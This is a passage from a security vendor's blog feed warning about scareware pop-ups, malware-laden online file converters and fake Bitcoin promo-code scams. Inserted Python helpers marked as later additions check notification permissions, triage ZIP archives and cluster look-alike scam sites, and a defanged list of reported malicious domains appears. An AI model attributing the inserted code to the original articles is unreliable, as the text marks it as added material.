Online Security – Gridinsoft Blog
https://gridinsoft.com/blogs
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Wed, 09 Jul 2025 00:57:41 +0000

Fake Virus Alert – How to Spot and Remove Scareware Pop-ups
https://gridinsoft.com/blogs/fake-virus-alert-how-to-get-rid/
Tue, 24 Jun 2025 10:36:52 +0000

Fake virus alerts are deceptive pop-ups designed to scare you into thinking your computer is infected. These scareware tactics trick victims into downloading malicious software, calling fake tech support, or paying for unnecessary “antivirus” services. The good news? Once you know what to look for, these scams become easy to spot and avoid.

These fake warnings are part of a broader category of browser-based phishing attacks that exploit user fear and urgency. Unlike legitimate security warnings, these pop-ups are designed to manipulate you into making hasty decisions that benefit cybercriminals.

Threat Summary

Threat Name Fake Virus Alert (Scareware)
Threat Type Scareware, Social Engineering, Phishing, Malware Distribution
Distribution Method Malicious websites, compromised ads, browser hijackers, rogue extensions
Common Claims “Your computer is infected,” “Critical threat detected,” “Immediate action required”
Requested Actions Download fake antivirus, call tech support, provide payment information
Potential Damage Malware installation, financial loss, identity theft, system compromise
Detection Names Scareware, Rogue:Win32/FakeAlert, PUA:Win32/FakeAV

What is a fake virus alert?

Fake Virus Alert From Microsoft Defender

A fake virus alert is a deceptive message that appears on your screen, falsely claiming your system is infected with malware. These scareware pop-ups can appear in browsers, as system notifications, or even as fake desktop applications. They’re designed to create panic and pressure you into taking immediate action that benefits the scammers.

Unlike legitimate security warnings from your actual antivirus software, these fake alerts often use alarming language like “Critical threat!” or “Your computer is at risk of serious damage!” They’re commonly distributed through malicious browser notifications, compromised websites, and fake CAPTCHA pages.

How Fake Virus Alerts Work

These scams operate through several methods, all designed to exploit your natural concern for computer security:

  • Rogue Antivirus Software: Fake security programs that display constant warnings about non-existent threats, demanding payment for “premium” protection
  • Browser Pop-ups: Intrusive alerts that appear while browsing, often impossible to close without following their instructions
  • System Tray Notifications: Fake warnings that mimic legitimate OS security alerts, appearing directly in your system notification area
  • Tech Support Scams: Messages that provide phone numbers for “immediate technical assistance” from fake support teams

Fake Virus Alert From McAfee

These fake alerts are closely related to other online scams like fake McAfee email alerts and Norton payment scams. The goal is always the same: create urgency and fear to bypass your critical thinking.

The psychology behind these scams is simple but effective. When people see warnings about computer viruses, they often panic and act without thinking. This emotional response is exactly what scammers count on to make their fake alerts successful.

Example of Rogue antivirus

Redirections appear when you click through some less-than-trustworthy pages. Compromised sites, or ones whose administrators do not care who they’re referring to, may contain several such malicious links. They are not a sign of malware, but unfortunately, fake virus notifications that appear for that reason alone are quite rare.

However, there are quite a lot of instances where they serve malicious purposes. Such plugins are pretty easy to spread, which makes them very attractive to attackers. Common lures look like advertising pages that require you to “install a plugin to confirm that you are not a robot” or present “a security advisory”. They have become a popular method of spreading infection, as they are embedded in the browser and are often ignored by weak antivirus programs. In addition, they are aimed at stealing user data, of which there is plenty in the browser.

Signs of fake virus alerts

Fake virus alerts can be convincing, but there are several telltale signs that help you identify them. Understanding these warning signs can assist you in avoiding phony pop-up alerts and dangerous phishing links. Generally, trust your instincts: if something seems off, it probably is. These scams share similarities with fake Apple ID alerts and other social engineering attacks.

Here are the key red flags that indicate a fake virus alert:

  • Fake-sounding products: Fake virus warnings are typically straightforward. They often promote fraudulent products. Learning about the best antivirus software will make it simple to recognize fraudulent software.
  • High-frequency alerts: The sudden increase in warnings about the virus is alarming. However, this is a common tactic used by adware. The goal is to make you anxious enough to download their fraudulent product.
  • Bad grammar: A legitimate corporation takes time to refine its messaging and communications. Fake virus software scams will often have spelling and grammar errors and also apply strange text designs – like numerous “#” or “_” symbols across the text.
  • Vague wording: Unclear promises or vague descriptions are suspect. Reputable antivirus software will use straightforward language to describe its product and benefits.

The list of signs is not complete, as crooks have proven to be inventive enough to find new ideas for their banners. However, most of the time one or several of the symptoms named above will appear, and that should raise your suspicion.

Examples of fake virus alerts

A fake virus alert can have multiple forms. Understanding the following examples of virus warnings can assist you in recognizing scams before they have a chance to cause harm. These scams often work in conjunction with fake CAPTCHA attacks and other social engineering tactics. These are some examples:

1. Malvertisements

Malvertising is hackers’ deceptive usage of legitimate advertising networks to infect ads that show up on websites you trust. These ads often claim your computer is infected with a virus and attempt to sell bogus antivirus programs. Pay attention only if you receive notifications about your computer being infected with malware.

Example of malvertisements

2. Fake versions of real ads

Fake virus alerts can also arrive as deceptive counterfeit versions of ads from reputable businesses. These fakes use dubious claims and exaggerated language full of fear. They also offer absurdly favorable terms.

3. System tray notifications

As opposed to common fake virus warnings, system tray notifications are rare. They appear as notifications in your system tray that inform you of a serious infection that requires immediate attention. Authentic-looking notifications are much more effective because they look more realistic. When you see one, make sure it’s not a fake before you choose to respond. By examining the language of an alert, you can determine if it’s real or fake. Fraudulent messages use emotional words to manipulate you and trick you into rash decisions. They also typically have formatting issues or fonts that do not match up.

How to Avoid Fake Virus Alerts

Prevention is always better than dealing with the aftermath. Here are essential steps to protect yourself from fake virus alerts and related online scams:

  • Avoid unsecured websites: Stick to reputable sites with HTTPS encryption. Unsecured sites are more likely to host malicious ads and fake virus warnings.
  • Use ad blockers: Quality ad blocking extensions can prevent malicious advertisements from appearing and reduce exposure to fake alerts.
  • Keep software updated: Enable automatic updates for your operating system, browser, and security software to patch vulnerabilities that scammers exploit.
  • Install reputable antivirus software: Legitimate antivirus programs can detect and block scareware before it affects your system.
  • Be cautious with downloads: Only download software from official sources. Avoid suspicious email attachments and software from unknown developers.
  • Learn about current threats: Stay informed about new scam tactics and emerging threats to recognize them quickly.

What to Do If You Interact with a Fake Virus Alert

If you’ve accidentally clicked on a fake virus alert or provided information to scammers, take these immediate steps:

  • Change passwords: Update login credentials for all important accounts, especially if you entered any passwords.
  • Enable two-factor authentication: Add extra security layers to prevent unauthorized access to your accounts.
  • Monitor financial accounts: Watch for unauthorized transactions and contact your bank if you shared financial information.
  • Run security scans: Use legitimate antivirus software to check for any malware that might have been installed.
  • Consider identity protection: If you shared personal information, monitor your credit reports and consider placing fraud alerts.

How to remove a fake virus alert?

Step 1. Remove push notifications

If you encounter a fake virus alert, the first step is to shut down your browser. A key combination like Alt+F4, or Command+Q on macOS, will accomplish the task. If this is not possible because the browser is sluggish, you can force it to close through your system tools. This helps prevent you from tapping on the pop-up, which can lead to further problems. Then reopen the browser to start troubleshooting.

If you have subscribed to push notifications from scam sites, you can remove them through the browser interface. Go to your browser settings, find the notification settings and remove all the sites that are listed as ones that can send notifications. Reload the browser to apply the changes.
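To review notification permissions outside the settings screen, the following added example (not part of the original article) reads a Chromium-style profile `Preferences` JSON file and lists the hosts that are allowed to send notifications. It assumes the `profile.content_settings.exceptions.notifications` layout with `setting` 1 for allow and 2 for block; the sample data and host names are constructed.

```python
import json
import sys
from urllib.parse import urlsplit

# Assumed layout of a Chromium-based browser's "Preferences" file:
# profile.content_settings.exceptions.notifications is a dict keyed by
# "<origin>,*" whose entries carry "setting": 1 (allow) or 2 (block).
ALLOW, BLOCK = 1, 2

# Constructed sample; the host names are placeholders, not real indicators.
SAMPLE_PREFERENCES = json.dumps({
    "profile": {"content_settings": {"exceptions": {"notifications": {
        "https://mail.example.com:443,*": {"setting": 1},
        "https://pc-scan-alert.example.net:443,*": {"setting": 1},
        "https://news.example.org:443,*": {"setting": 2},
    }}}}
})


def host_of(pattern_key):
    """Extract the host from a key such as 'https://site.example:443,*'."""
    primary = pattern_key.split(",", 1)[0]
    try:
        host = urlsplit(primary).hostname
    except ValueError:
        host = None
    return host or primary  # fall back to the raw pattern if it is not a URL


def notification_permissions(preferences_text):
    """Return {'allowed': [...], 'blocked': [...]} host lists, sorted."""
    node = json.loads(preferences_text)
    for key in ("profile", "content_settings", "exceptions", "notifications"):
        node = node.get(key, {}) if isinstance(node, dict) else {}
    result = {"allowed": [], "blocked": []}
    if not isinstance(node, dict):
        return result
    for pattern, entry in node.items():
        setting = entry.get("setting") if isinstance(entry, dict) else None
        if setting == ALLOW:
            result["allowed"].append(host_of(pattern))
        elif setting == BLOCK:
            result["blocked"].append(host_of(pattern))
    result["allowed"].sort()
    result["blocked"].sort()
    return result


def unexpected_senders(preferences_text, trusted_hosts):
    """Hosts with notification permission that are not on the user's own list."""
    trusted = {h.lower() for h in trusted_hosts}
    allowed = notification_permissions(preferences_text)["allowed"]
    return [h for h in allowed if h.lower() not in trusted]


if __name__ == "__main__":
    # Pass the path to a profile's Preferences file, or run without
    # arguments to use the constructed sample above.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            text = fh.read()
    else:
        text = SAMPLE_PREFERENCES
    for host in unexpected_senders(text, trusted_hosts=["mail.example.com"]):
        print("review and remove notification permission for:", host)
```

The script only reads the file; the permissions themselves are still removed through the browser settings as described above.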

Step 2. Remove any suspicious extensions.


Google Chrome

  1. Launch the Chrome browser.
  2. Click on the icon "Configure and Manage Google Chrome" ⇢ Additional Tools ⇢ Extensions.
  3. Click "Remove" next to the extension.

If you have an extension button on the browser toolbar, right-click it and select Remove from Chrome.

Mozilla Firefox

  1. Click the menu button, select Add-ons and Themes, and then click Extensions.
  2. Scroll through the extensions.
  3. Click on the … (three dots) icon for the extension you want to delete and select Delete.

Microsoft Edge

  1. Launch the Microsoft Edge browser.
  2. Click the three dots (…) menu in the top right corner.
  3. Select Extensions.
  4. Find the extension you want to remove and click Remove.
  5. Click Remove again to confirm.

Alternatively, you can type edge://extensions/ in the address bar to access the extensions page directly.

Opera

  1. Launch the Opera browser.
  2. Click the Opera menu button in the top left corner.
  3. Select Extensions ⇢ Manage extensions.
  4. Find the extension you want to remove and click the X button next to it.
  5. Click Remove to confirm.

Alternatively, you can type opera://extensions/ in the address bar to access the extensions page directly.

Step 3. Reset browser settings

Resetting your browser settings is one of the first things you should do to eliminate the Windows Defender security warning scam. The following instructions tell you how to do this in different browsers:


Google Chrome

  1. Tap on the three vertical dots in the top right corner and choose Settings.
  2. Choose Reset and Clean up, then Restore settings to their original defaults.
  3. Tap Reset settings.

Mozilla Firefox

  1. In the upper right corner tap the three-line icon and choose Help.
  2. Choose More Troubleshooting Information.
  3. Choose Refresh Firefox… then Refresh Firefox.

Microsoft Edge

  1. Tap the three dots (…).
  2. Choose Settings.
  3. Tap Reset Settings, then click Restore settings to their default values.

Opera

  1. Launch the Opera browser.
  2. Click the Opera menu button in the top left corner and select Settings.
  3. Scroll down to the Advanced section in the left sidebar and click Reset and clean up.
  4. Click Restore settings to their original defaults.
  5. Click Reset settings to confirm.

Alternatively, you can type opera://settings/reset in the address bar to access reset options directly.

Step 4. Remove suspicious apps

Find and remove the suspicious app: Now go to settings and click on the ‘Apps’ section. Look for a list of current apps (you may need to select ‘App manager’ for a comprehensive list) and locate the malicious app. Open the app’s information and then select the option to uninstall. This should eliminate suspicious apps.

If you can’t find the suspicious program in the list of all programs on your device, you need to scan your device with an antivirus. If the app has been given device administrator rights, you must remove this designation before you can uninstall it. To accomplish this, go into your security settings and locate the section titled “Device Admin Apps”. Uncheck the app you want to remove and then choose to deactivate it in the next step. You should now be able to delete the app.

Step 5. Scan your PC for viruses

If you examine your computer and can’t find any suspicious files, you should consider installing antivirus software — this is if you don’t already have it. You can utilize the software to search for malware that may be concealed within your computer. If the scan identifies a threat, it can attempt to remove it and prevent further damage to your device.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Stay Protected Against Fake Virus Alerts

Fake virus alerts prey on fear and urgency to bypass your critical thinking. By understanding how these scams work and recognizing their warning signs, you can protect yourself from becoming a victim. Remember that legitimate antivirus software doesn’t use scare tactics or demand immediate payment through pop-ups.

The key to staying safe is maintaining a healthy skepticism toward unexpected security warnings. When in doubt, close the suspicious pop-up and run a scan with your trusted antivirus software. This approach protects you from fake alerts while ensuring real threats are properly addressed.

Stay informed about current cybersecurity threats and scam tactics to keep yourself and others safe. Understanding how scammers operate helps build a stronger defense against their constantly evolving tactics.

Frequently Asked Questions

Do real antivirus programs send virus alerts?

Yes, legitimate antivirus software does send alerts when threats are detected. However, real alerts come from your installed security software, not random browser pop-ups. They provide specific details about the threat and don’t demand immediate payment or phone calls.

Can fake virus alerts actually install malware?

While the alert itself is fake, clicking on it can lead to real malware infections. Scammers use these fake warnings to trick you into downloading malicious software disguised as antivirus programs. This is similar to how fake GitHub repositories distribute malware.

Why do I keep getting fake virus alerts?

Repeated fake alerts usually indicate you’ve visited compromised websites, have malicious browser extensions installed, or your browser notifications are compromised. These alerts are also common if you’ve been exposed to browser hijacking malware.

How can I tell if a virus alert is real?

Real virus alerts come from your installed antivirus software, appear in the system tray or security center, and provide specific details about detected threats. They never demand immediate payment, phone calls, or browser downloads.

What should I do if I paid money to a fake virus alert scam?

Contact your bank or credit card company immediately to report the fraudulent charge. File a complaint with the FTC and monitor your accounts for additional unauthorized transactions. Consider this a learning opportunity about payment scams and similar fraud tactics.

Can mobile devices get fake virus alerts?

Yes, mobile devices can receive fake virus alerts through malicious websites and apps. These mobile scareware attacks are similar to iPhone calendar spam and other mobile-specific scams. Always be suspicious of unexpected security warnings on any device.

FBI Issues Online File Converter Malware Scam Warning
https://gridinsoft.com/blogs/online-file-converter-scam-fbi-warning/
Tue, 25 Mar 2025 13:41:28 +0000

The FBI Denver Field Office has warned about a growing scam involving free online file converter tools, which appears to be a significant cybersecurity concern. These tools, while converting files as advertised, often distribute malware, leading to serious issues like ransomware and identity theft, affecting users across the region.

Online File Converter Scam Warning by FBI Denver

On March 7, 2025, the FBI Denver Field Office released a statement warning the public about a scam involving free online document converter tools. These tools, while converting files as advertised, often distribute malware, leading to serious issues like ransomware and identity theft, affecting users across the region. FBI Denver has also highlighted that this is not a localized issue, but rather a global scheme orchestrated by cybercriminals worldwide. The agency has observed a noticeable increase in the number of these deceptive free online converters, signifying a growing trend in this type of cyberattack.

The methods employed by these cybercriminals involve offering seemingly legitimate free file conversion services that, in reality, deliver malicious software or exfiltrate uploaded information such as Social Security numbers, financial credentials, and cryptocurrency details. Cybercriminals create fake online file converter websites that closely resemble legitimate tools.

Fake online file converter in the Google Ads

These deceptive sites often mimic the appearance and functionality of popular platforms used for converting common file formats such as .pdf, .doc, and .jpg. They may also offer services such as combining multiple files into one, for instance, merging several .jpg images into a single .pdf document. Furthermore, some fraudulent sites masquerade as tools for downloading MP3 or MP4 media files from various online sources.

By employing sophisticated URL manipulation tactics and potentially paying for search engine advertisements, these fraudulent sites can appear at the top of search results, making them highly visible to users actively searching for online file conversion tools. Overall, this is a common tactic, with ads in Google search results serving as a vector for the spread of malware.

How does the malware scheme operate?

The primary method by which these fake online file converters compromise users’ systems is by embedding malware within the converted file that the user subsequently downloads. Alarmingly, many of these fraudulent converters actually perform the advertised file conversion, leading victims to believe that the process was successful and legitimate. This functional aspect of the scam makes it pretty convincing, as users are less likely to suspect malicious activity if they receive the expected converted file.

In some instances, the cybercriminals may employ a slightly different tactic, encouraging users to download a separate software tool or a browser extension to facilitate the file conversion process. These seemingly helpful downloads, however, are often the vehicles through which malware is installed on the victim’s device.

Recent research suggests that the malware involved is often a loader-type malware, such as Gootloader, which is a JScript-based malware family leveraging SEO poisoning. Gootloader typically lures victims into downloading a ZIP archive that poses as a document, containing a JavaScript file. When executed, this file connects to a command and control server to download additional malware, such as infostealers or ransomware.
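The delivery pattern described above, a ZIP archive that poses as a document but carries a script, can be checked before anything is opened. The following added example (not from the article or the FBI notice) lists a ZIP's members in memory and flags script and executable types, including ones inside nested archives; the extension lists and the sample archive are assumptions constructed for illustration.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Extension sets are assumptions chosen for this example, not a complete list.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1", ".bat", ".cmd"}
BINARY_EXTS = {".exe", ".scr", ".msi", ".dll", ".lnk"}
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}
MAX_NESTED_BYTES = 20 * 1024 * 1024  # do not unpack very large nested archives


def classify(filename):
    """Return a reason string if the member name looks dangerous, else None."""
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    if not suffixes:
        return None
    ext = suffixes[-1]
    if ext in SCRIPT_EXTS or ext in BINARY_EXTS:
        kind = "script" if ext in SCRIPT_EXTS else "executable"
        if len(suffixes) > 1 and suffixes[-2] in DOCUMENT_EXTS:
            return f"{kind} hidden behind document-style double extension"
        return f"{kind} file inside archive"
    return None


def triage_zip(data, depth=2, prefix=""):
    """Return (member_path, reason) findings for ZIP bytes, without writing to disk."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [(prefix or "<archive>", "not a readable ZIP file")]
    findings = []
    with archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            reason = classify(info.filename)
            if reason:
                findings.append((path, reason))
            elif info.filename.lower().endswith(".zip"):
                if info.flag_bits & 0x1:  # bit 0 marks an encrypted member
                    findings.append((path, "encrypted nested archive, contents not inspected"))
                elif depth > 0 and info.file_size <= MAX_NESTED_BYTES:
                    findings.extend(triage_zip(archive.read(info), depth - 1, path + "!/"))
                else:
                    findings.append((path, "nested archive not inspected (depth or size limit)"))
    return findings


def build_sample_archive():
    """Constructed sample: harmless placeholder text stands in for file contents."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("invoice.pdf.js", "// placeholder, not real code")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("converted/report.pdf", "placeholder document bytes")
        z.writestr("converted/free_contract_template.js", "// placeholder")
        z.writestr("extras/more.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for path, reason in triage_zip(build_sample_archive()):
        print(f"{path}: {reason}")
```

A clean result only means no member name matched the lists; it does not replace scanning the archive with anti-malware software.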

Another prevalent technique used by these fake converters is “scraping” the files that users upload for conversion. This involves the malicious website directly extracting personal information from the submitted files, such as Social Security numbers, passwords, and banking or cryptocurrency details, without necessarily relying on persistent malware installation.

This dual approach, combining malware installation with direct data theft, maximizes the potential for harm and financial gain for the attackers. The exploitation of search engine rankings further increases the chances of users encountering these malicious sites in the first place.

While the official FBI warning might not explicitly name specific malicious websites, as of now, some researchers have reported on examples. These examples include:

  • Imageconvertors[.]com
  • convertitoremp3[.]it
  • convertisseurs-pdf[.]com
  • convertscloud[.]com
  • convertix-api[.]xyz
  • convertallfiles[.]com
  • freejpgtopdfconverter[.]com
  • primeconvertapp[.]com
  • 9convert[.]com

These are just a few sites, most of which are already non-functional. However, if you come across a suspicious site and doubt whether it is malicious or not, you can use our free URL scanner.

How to protect yourself?

While the use of the above methods is nothing new, we are now seeing a continuing trend of attackers using search advertising. Looking ahead, these deceptive tactics will continue to evolve. We can anticipate seeing more sophisticated methods of social engineering, involving artificial intelligence.

For users, the best approach is to cultivate a mindset of caution and skepticism. Prioritize using reputable software (not cracked) installed directly on your computer or well-known online services from trusted providers. Remember that if a service seems too good to be true, it probably is, and the convenience of a free online file converter might come at a significant cost to your security and privacy.

Given the nature of these threats, users should also consider enabling two-factor authentication for added security and regularly updating all software to patch vulnerabilities. A strong recommendation is to use anti-malware software like GridinSoft Anti-Malware, which excels at detecting and removing threats. Its Internet Security module and real-time protection provide protection against these file converter scams.

0.31 BTC Promo Code STICKS
https://gridinsoft.com/blogs/0-31-btc-promo-code-sticks-scam/
Wed, 12 Feb 2025 08:52:30 +0000

Social media users interested in cryptocurrency may have come across a 0.31 BTC Promo Code STICKS, endorsed by Elon Musk himself. As it turns out, this is a scam that has nothing to do with the famous man. In this post, I will break down this scam in detail and find out how to avoid it.

0.31 BTC Promo Code STICKS Overview

0.31 BTC Promo Code STICKS is yet another fraudulent scheme circulating on the internet that supposedly gives everyone 0.31 Bitcoin for just using a promo code. Because who doesn’t love the idea of magically acquiring 0.31 Bitcoin just by typing a code? This particular scam spreads across Instagram, TikTok, and YouTube. The fraudsters behind it promise free Bitcoin using the promo code “STICKS,” allegedly linked to none other than Elon Musk.

Fake video with Elon Musk

While Elon Musk regularly promotes all sorts of questionable subjects on X/Twitter, 0.31 BTC Promo Code STICKS is an obvious fraud, and has nothing to do with the aforementioned character. The scam is gaining traction through short, eye-catching videos that showcase a seemingly effortless process: enter the promo code, and Bitcoin appears in your account, ready to withdraw. Except, not really.

The scam operates through a fraudulent website called TWXBit, which, like many before it, exists solely to lure users into making a deposit they’ll never see again. By the way, we have a review for a completely similar scheme but with a different promo code. Similar to the above example, the site maintains an illusion of legitimacy with a polished interface and instant “rewards.”

However, when users attempt to cash out the crypto promised in 0.31 BTC Promo Code scam, they encounter a predictable obstacle: their accounts require “activation” through a deposit. And just like that, the con artists have pocketed your hard-earned money while you stare at a frozen balance that will never move.

How Does It Work?

The scam follows a straightforward but effective pattern. We also have a separate post about this, which I recommend reading. It all starts with a well-crafted bait – an enticing video showing someone entering the “STICKS” promo code and receiving instant Bitcoin. The videos appear across multiple social media platforms, designed to go viral and hook unsuspecting victims. It is worth mentioning once again that all these celebrity videos are fake. They are either clips of old videos with overlaid audio/subtitles or videos generated entirely by neural networks.

Video guide how to use the 0.31 BTC Promo Code STICKS

Once a user follows the link in the video description, they land on TWXBit’s website, where they’re prompted to create an account. In fact, there are millions of such sites, and as I have already mentioned many times – they work on the same scheme. Everything appears legitimate, with a sleek design and a seemingly active platform. Upon logging in, the user enters the promo code, and the site immediately displays a Bitcoin balance. At this point, it looks like the real deal.

Fake account balance

But when the user attempts to withdraw their “free” Bitcoin, the scam kicks into high gear. A message appears stating that their account must be activated first by making a deposit – conveniently, just a fraction of the Bitcoin they were promised. The website assures them this is a standard security measure to prevent bots and fake users. It sounds reasonable enough, so the victim transfers the money, expecting to unlock their funds.

Culmination of the 0.31 BTC Promo Code STICKS scam promotion with a fake “Completed” popup

Instead, they receive yet another message: their account now requires additional verification, usually in the form of another deposit. The more they comply, the deeper they sink into the scam. Eventually, they either realize they’ve been had or keep paying until their funds run dry. Either way, the scammers win, and the victim walks away with nothing but regret.

Why Is 0.31 BTC Promo Code Scam Dangerous?

Beyond the immediate financial loss, these scams come with another layer of danger – data theft. The registration process requires users to submit personal information, including email addresses, passwords, and sometimes even phone numbers. Scammers don’t just steal money; they also harvest these details for future attacks.

Once collected, this information often gets sold on dark web marketplaces, where cybercriminals use it for phishing, identity theft, and other malicious activities. The more widespread a user’s compromised data becomes, the greater the risk of falling victim to further scams or account takeovers.

And let’s not forget the potential for password reuse – if someone uses the same password across multiple accounts, they’ve just handed cybercriminals access to those as well. I have also detailed what passwords should be in a separate post.

To make matters worse, security tools like VirusTotal and our online scanner have already flagged TWXBit as malicious. In short, victims don’t just lose money; they risk losing control over their personal data and online security.

What Can I Do After Getting Scammed?

Unfortunately, once money is sent to these scammers in the course of the 0.31 BTC Promo Code fraud, recovering it is nearly impossible. Cryptocurrency transactions are irreversible by design, making them a favorite tool for fraudsters. However, there are still a few damage-control steps to take.

First, report the video to the platform where you found it – whether that’s Instagram, TikTok, or YouTube. While this won’t get your money back, it can help prevent others from falling into the same trap. Next, contact the exchange or wallet service you used to send the funds and inform them of the fraudulent transaction. While they can’t reverse the transaction, they may flag the recipient’s wallet address and prevent further transactions to it.

Since scams like these often involve credential harvesting, it’s critical to change any passwords associated with the account you used to sign up. If you reused that password elsewhere (which, let’s be honest, many people do), change it on those accounts as well. Enabling two-factor authentication (2FA) is also a smart move to add an extra layer of security.

Lastly, ignore any messages from so-called “recovery experts” promising to get your funds back for a fee. These are just scammers on top of scammers, preying on desperate victims. If you engage with them, you’ll likely end up losing even more money.

The best defense against these scams? Awareness. If an offer seems too good to be true – especially when it involves free Bitcoin – chances are, it’s a scam. Stay skeptical, stay informed, and don’t let videos and fake celebrity names fool you.

0.31 BTC Promo Code GRANTX Scam Overview https://gridinsoft.com/blogs/0-31-btc-promo-code-grantx-scam/ Fri, 31 Jan 2025 08:58:22 +0000

Crypto enthusiasts and investors may come across the 0.31 BTC Promo Code GRANTX scam, supposedly promoted by Elon Musk, Bill Gates or another celebrity. Under the guise of legitimate investments, con artists get their hands on the wallets of users who take the bait. Although for some people this fraud may be quite obvious, in this post I will detail why it is a scam and what to look for to avoid falling victim to it.

0.31 BTC Promo Code GRANTX Overview

If you’ve ever dreamed of getting free Bitcoin just by entering a promo code, congratulations! You’re exactly the kind of person scammers are hoping to find. The latest scheme circulating on social media, Xistrade.com, promises users a generous 0.31 BTC for simply registering and using the promo code GRANTX. Sounds too good to be true? That’s because it is.

0.31 BTC Promo Code GRANTX  website screenshot
Fake website

The website claims that the funds are instantly credited to your account. The catch is that the moment you try to withdraw the “prize”, you get hit with a classic bait-and-switch tactic: you need to “activate” your account by depositing real Bitcoin first. And once you do, forget about ever seeing that money again. The scammers vanish, leaving you with an empty wallet and a newfound distrust of online crypto giveaways.

This scam is aggressively promoted across all major social media platforms, and even messaging apps like Telegram and WhatsApp. However, unlike other scams I’ve written about, the 0.31 BTC Promo Code GRANTX scam is most often promoted through TikTok rather than X/Twitter.

Criminals use short videos, typically featuring deepfakes or misleading edits of famous figures like Elon Musk, to make the scheme seem legitimate. The goal is simple – trick users into thinking they’re getting something for free, only to steal their funds through fabricated activation fees.

How Does It Work?

Like many others, 0.31 BTC Promo Code GRANTX, along with its website, Xistrade.com, operates at its core as a social engineering scam that exploits human greed and trust in online promotions. One of its signature moves, and a key indicator of fraud, is the use of fake celebrity endorsements cobbled together with generative AI.

Scam promotion TikTok
0.31 BTC Promo Code GRANTX scam promotion video on TikTok

Scammers leverage deepfake technology or recycle old footage of tech moguls like Elon Musk, Jeff Bezos, or Bill Gates. They slap on some AI-generated audio or misleading captions, making it seem like these billionaires have personally decided to hand out crypto to random internet strangers.

0.31 BTC Promo Code GRANTX video
Scam video shows the use of a promo code

These videos are then spread across social media, targeting users who are more likely to believe in the legitimacy of a promotion when it appears to have the backing of a tech billionaire. The website is designed to mimic a real cryptocurrency exchange, complete with a professional-looking interface, fake account balances, and a seemingly functional deposit and withdrawal system. However, everything beyond the deposit function is an illusion.

fake account balance
Video with fake account balance

Withdrawal Restrictions & Top-Up Demand

The moment users attempt to withdraw their so-called free Bitcoin, they encounter a fabricated restriction. To proceed, they are required to deposit a small amount first, typically around 0.0025 to 0.005 BTC. This is a psychological trick known as the sunk cost fallacy. Victims, having already invested time into the process, feel compelled to send the deposit in hopes of unlocking their funds. However, the deposit unlocks nothing.

The site’s backend is programmed to generate dynamic wallet addresses for each victim. This ensures that transactions cannot be easily traced back to a single source. These addresses are controlled by the scammers, who can immediately transfer funds elsewhere once a deposit is made. Unlike legitimate exchanges that implement multi-signature wallets and withdrawal verification processes, Xistrade.com has no such security measures because its sole purpose is to steal money.

The domain’s WHOIS data is deliberately obfuscated, a common tactic used by many site owners, both legit and fraudulent. Additionally, its association with over a thousand other fraudulent domains suggests the use of automated tools to generate and deploy scam websites en masse. These sites often share identical templates but differ in branding and promotional codes.

All this allows crooks to quickly replace one domain with another once authorities catch on. Our URL scanner identified over 1k structurally similar websites linked to Xistrade.com, indicating a widespread scam network designed to repeatedly target victims under different names.
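The template reuse described above can be detected by comparing pages on markup structure alone, ignoring brand names and promo codes. The following is an added example, not Gridinsoft's URL scanner or code from the post; the page samples, host names and the 0.7 threshold are constructed assumptions.

```python
from html.parser import HTMLParser

# Attributes that describe layout; text, links and images carry the
# per-site branding and are deliberately ignored.
STRUCTURAL_ATTRS = ("id", "class", "name", "type")


class SkeletonParser(HTMLParser):
    """Collects the tag skeleton of a page, dropping all visible text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tokens = []

    def handle_starttag(self, tag, attrs):
        kept = sorted((k, v or "") for k, v in attrs if k in STRUCTURAL_ATTRS)
        self.tokens.append(tag + "".join(f"[{k}={v}]" for k, v in kept))

    def handle_endtag(self, tag):
        self.tokens.append("/" + tag)


def skeleton(html):
    parser = SkeletonParser()
    parser.feed(html)
    parser.close()
    return parser.tokens


def shingles(tokens, k=4):
    """Set of k-token windows; tolerant of a few added or removed elements."""
    if len(tokens) < k:
        return {tuple(tokens)}
    return {tuple(tokens[i:i + k]) for i in range(len(tokens) - k + 1)}


def similarity(html_a, html_b):
    """Jaccard similarity of the structural shingles, from 0.0 to 1.0."""
    a, b = shingles(skeleton(html_a)), shingles(skeleton(html_b))
    return len(a & b) / len(a | b)


def cluster(pages, threshold=0.7):
    """Greedy grouping: a page joins the first cluster whose seed it resembles."""
    clusters = []  # list of (seed_html, [host names])
    for name, html in pages.items():
        for seed, members in clusters:
            if similarity(seed, html) >= threshold:
                members.append(name)
                break
        else:
            clusters.append((html, [name]))
    return [members for _, members in clusters]


# Constructed sample pages (not captured from any real site).
TEMPLATE = """<html><head><title>{brand}</title></head><body>
<div class="hero"><h1>{brand}</h1><p>Enter promo code {code}</p></div>
<form id="signup"><input type="email" name="email"><input type="password" name="pw">
<button type="submit">Register</button></form>
<div class="balance"><span class="amount">0.31 BTC</span></div>
{extra}</body></html>"""

PAGES = {
    "site-a.example": TEMPLATE.format(brand="Brand A", code="CODE-A", extra=""),
    "site-b.example": TEMPLATE.format(brand="Brand B", code="CODE-B", extra=""),
    # Same template with one extra widget (a countdown timer).
    "site-c.example": TEMPLATE.format(
        brand="Brand C", code="CODE-C",
        extra='<div class="timer"><span>09:59</span></div>\n'),
    "blog.example": "<html><head><title>Blog</title><meta charset='utf-8'></head>"
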